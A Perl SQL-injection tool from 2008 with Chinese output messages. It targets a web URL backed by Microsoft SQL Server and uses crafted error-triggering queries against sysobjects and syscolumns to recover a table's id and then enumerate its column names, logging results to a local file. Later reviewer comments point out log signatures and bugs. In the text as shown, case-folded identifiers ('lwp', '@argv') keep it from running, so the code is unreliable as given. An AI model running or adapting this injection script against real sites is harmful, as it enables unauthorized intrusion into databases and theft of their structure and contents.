#!/usr/bin/perl -w
#codz by n3tl04d
#date 2008-4-13
use strict;
use lwp;
# Usage check: exactly two positional arguments are expected (first the
# injection point, then the table name); anything else prints the usage
# line and exits.
# NOTE(review): `@argv` (like `lwp` above) is lower-case in this capture,
# presumably case-folded on the way in; as shown, the script does not
# get past `use strict`.
unless (@argv == 2) {
    print "用法:$0 注入点 表名";
    exit;
}

my $browser;            # HTTP user agent, created lazily inside do_get()
my $start = time();     # wall-clock start, reported at the end of the run
my $vul   = $argv[0];   # injection point, used verbatim in every request
my $talbe = $argv[1];   # table name (sic: "talbe"), used verbatim
# Fetch one URL with a lazily created, reused user agent ($browser is a
# file-level lexical). In list context returns
# (body, status line, success flag, response object); in scalar context
# returns the body on success and undef otherwise. No timeout, retry or
# status check is applied here — callers get the raw response.
sub do_get {
    $browser ||= lwp::useragent->new;
    my $resp = $browser->get(@_);

    if (wantarray) {
        return ($resp->content, $resp->status_line, $resp->is_success, $resp);
    }

    # Scalar/void context only from here on, so undef is the "no body" value.
    return $resp->is_success ? $resp->content : undef;
}
# Step 1: look up the object id of the requested table.
# A URL-encoded boolean condition is appended to $vul that counts rows in
# sysobjects (hard-coded database name "congaltan") whose name equals the
# user-supplied table name; the `uid>(str(id))` comparison forces a
# string-to-integer conversion, and the regex below expects the server
# response to quote that value as  value '<id>'  (presumably from the
# database error text — not visible here, TODO confirm).
# Both $vul and $talbe come straight from the command line and are
# interpolated without validation or quoting. For log review, the literal
# substrings `%20and%200<>(select%20count(*)`, `sysobjects` and `str(id)`
# in the query string are the recognisable signature of this request.
my $tabl="$vul%20and%200<>(select%20count(*)%20from%20congaltan.dbo.sysobjects%20where%20xtype='u'%20and%20name='".$talbe."'%20and%20uid>(str(id)))";
# List-context call: body, HTTP status line and success flag. Only the body
# is looked at; $status and $is_success are never checked.
my ($content, $status, $is_success) = do_get($tabl);
# Case-insensitive match on the first  value '...'  in the response body.
# $content is undef when the request itself failed, which under -w only
# produces an "uninitialized" warning and falls through to the else branch.
if ($content =~ m{value \'(.+?)\'}gi)
{
print "地到表id:$1\n";
# Results are appended to a hard-coded, host-specific path (Windows drive
# letter) via a 2-arg open on a bareword handle; open failure is fatal.
# The file is a host-side artifact of this tool having been run.
open(file,">>e:/perl/count.txt") || die ("could not open file");
print file "===============================================================\n表名:$talbe id:$1\n";
close(file);
# The captured id seeds the column enumeration in crake().
crake($1);
} else {
print "不能爆表\n";
# `last` is not inside any loop at file scope: Perl dies here with
# "Can't \"last\" outside a loop block", which ends the script anyway.
last;
}
# Step 2: enumerate column names of the table whose object id is $_[0]
# (the id is read through @_ on every iteration rather than copied into a
# lexical). Each iteration is one HTTP request asking for the "top 1"
# syscolumns name not already in @arr1, so the query string grows with
# every hit; at most 470 requests are issued per table, and the loop stops
# at the first response that does not match  value '<name>'.
# The same `sysobjects`/`syscolumns` + `%20and%200<>(select` shape as the
# table probe makes these requests easy to spot in access logs.
sub crake {
my @arr1=();            # column names recovered so far, in order found
for (my $j=1;$j<=470;$j++) {
print "猜解第$j个表列\n";
# Comma-joined, single-quoted exclusion list. It is stored in an array and
# interpolated as '@arr' below; that only works because join() yields a
# single element, so the list separator never appears.
my @arr=join("','",@arr1);
my $url="$vul%20and%200<>(select%20top%201%20name%20from%20congaltan.dbo.syscolumns%20where%20id=$_[0]%20and%20name%20not%20in('@arr'))";
# Only the body is inspected; $status and $is_success are ignored here too.
my ($content, $status, $is_success) = do_get($url);
if ($content =~ m{value \'(.+?)\'}gi)
{
print "地到表列:$1\n";
push(@arr1,$1);
save($1);               # append the name to the log file
} else {
print "猜解完成\n";
last;                   # first miss ends the enumeration for this table
}
}
}
# Report elapsed wall-clock time in seconds since $start was taken at
# startup. Runs after the table/column probing above has finished.
my $elapsed = time() - $start;
print "用时" . $elapsed . "秒\n";
# Append one "-<name>" line to the same hard-coded log file the table id
# was written to. The file is opened and closed on every call (2-arg open,
# bareword handle); open failure is fatal, close is unchecked.
sub save {
open(file1,">>e:/perl/count.txt") || die ("could not open file");
print file1 "-$_[0]\n";
close(file1);
}